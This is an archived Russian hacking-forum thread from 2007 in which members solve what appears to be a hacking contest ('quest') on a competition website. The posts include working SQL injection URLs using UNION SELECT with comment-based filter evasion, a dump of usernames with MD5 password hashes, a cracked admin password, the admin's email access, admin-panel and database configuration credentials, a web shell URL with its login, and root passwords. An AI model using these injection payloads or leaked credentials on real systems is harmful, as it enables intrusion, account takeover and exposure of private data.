новый квест -- теперь от gfs [Архив]

PDA

Просмотр полной версии : новый квест -- теперь от gfs

genom--

10.01.2007, 21:27

http://www.gfs-competition.net/index.php

Rebz

10.01.2007, 21:30

а где написано что это квест? а какое задание?

genom--

11.01.2007, 01:05

написано тут http://www.gfs-team.ru/?act=koncurs

и тут http://www.gfs-team.ru/

back0rifice

11.01.2007, 01:17

Видимо, вот оно, quest/задание:

_http://www.gfs-competition.net/index.php?act=news&id=(5

:D ...

back0rifice

11.01.2007, 02:12

ИМХО, странный quest какой-то... Шо за архив, ХЗ... Пока, кроме вот этого:

_http://www.gfs-competition.net/admin/index.php (есть подозрение на "login: FSadmin"), и
_http://gfs-konkurs.firstvds.ru/

больше ничего раздобыть не удалось... Либо я с утра туплю, либо...

guest3297

11.01.2007, 03:45

http://www.gfs-competition.net/admin/upload/
лолеги.

Phen1x

11.01.2007, 12:19

Что больше никто ниче не нашол ?

madnet

11.01.2007, 12:21

С помощьюскули получаем инфуиз БД

http://www.gfs-competition.net/index.php?act=news&id=-1/**/UNION/**/SELECT/**/1,name,pass,e_mail,5/**/from/**/users/**/LIMIT/**/1,1/*

FSadmin:a7551578824c35ccd3565fc3459456fb
Rash:ee24d27f87948cb213619ad4fddd6819
ravshan22:ee24d27f87948cb213619ad4fddd6819
alex05:e93821493d5341f2644919dff86049e8
daga:68880cf4a81608b3225ed8c79a935dae
fargus:ee24d27f87948cb213619ad4fddd6819
oleg:07840410f453190105cd3d00060afef4
Pfilipp:0d8020b23e0b7b208c227288036c125e
Dionir:5dbc4c6b18b210b6d0aa7427e7616b34
EDO:68880cf4a81608b3225ed8c79a935dae
Jurhen:ee24d27f87948cb213619ad4fddd6819
Sign:ee24d27f87948cb213619ad4fddd6819
StoRM:a2eec1f40c20a34342391785b1c8ca2b
kras:07840410f453190105cd3d00060afef4
MirAn:816119b15218af2db213db7be5441d38
Martin:68880cf4a81608b3225ed8c79a935dae
ventura:ca211094bc8c3244ce1baa821abc9aec
bob:816119b15218af2db213db7be5441d38
Sanek:ee24d27f87948cb213619ad4fddd6819

Админ: FSadmin
Брутим, получаем noway1
(спасибо брутеру mildworm =) )

Далее видим инфу по челу: email:fsadmin@mail.ru

Заходим на почту с помощью извесных нам данных
(СПАСИБО PSalm69 за идею с мэйлом !!!!!)

Пробезаем по всем мылам и в черновиках находим заветные
Пароль к админке: worker:beman

Идем в админку http://www.gfs-competition.net/admin/
и качаем архив, в итоге получаем код, который надо показать админам в доказательство прохождения 546460

Спасибо за внимание =)

P.S. забыл про приятнуюмалочь )
шелл
http://www.gfs-competition.net/admin/files/phpshell.php
root:unicorn

И.Г.

11.01.2007, 15:27

FSadmin:a7551578824c35ccd3565fc3459456fb noway1

Phen1x

11.01.2007, 15:28

Все прошли )) можете не тупить над этим

NIGHT_WOLF

11.01.2007, 15:34

Просто ради интереса, хэши с помощью sql вытащили ?
Какой код был ?

ReQuid

11.01.2007, 17:17

ну типо того

www.gfs-competition.net/index.php?act=news&id=666/**/union/**/select/**/1,name,pass,4,5/**/from/**/users/**/limit/**/9,10/*

madnet

11.01.2007, 17:42

читаем мой пост выше
https://forum.antichat.ru/showpost.php?p=263483&postcount=8

madnet

11.01.2007, 17:54

Ну и добиваем до конца
http://www.gfs-competition.net/admin/files/txt.php

<?
$host="localhost";
$user="konkurs";
$pass="xuitam";
$db="konkurs";
?>

madnet

11.01.2007, 18:26

http://www.gfs-competition.net/index.php?act=news&id=5

http://securityprobe.net/other/trash/hack.gif

madnet

11.01.2007, 18:54

Совсем забыл рута дать )
root:nwqghmt

Rebz

11.01.2007, 19:00

Маднет, Пслам!! Зачет!
наша школа :))

ReQuid

11.01.2007, 19:17

Далее видим инфу по челу: email:fsadmin@mail.ru

Заходим на почту с помощью извесных нам данных
(СПАСИБО PSalm69 за идею с мэйлом !!!!!)

А можно поподробнее - откуда это?

madnet

11.01.2007, 19:19

А можно поподробнее - откуда это?

из скули.

ReQuid

11.01.2007, 19:26

да ... не догадался =\

Jakudza

11.01.2007, 19:42

5 балов!!!!!!

NIGHT_WOLF

11.01.2007, 20:49

А каким эксплоитом пользовались для получения рута ? =)

Pridu_ROCK

12.01.2007, 00:45

ну чтож квестенг был пройден ...
Полное ПРАВИЛЬНОЕ прохождение лежит тут (http://www.gfs-team.ru/?act=koncurs)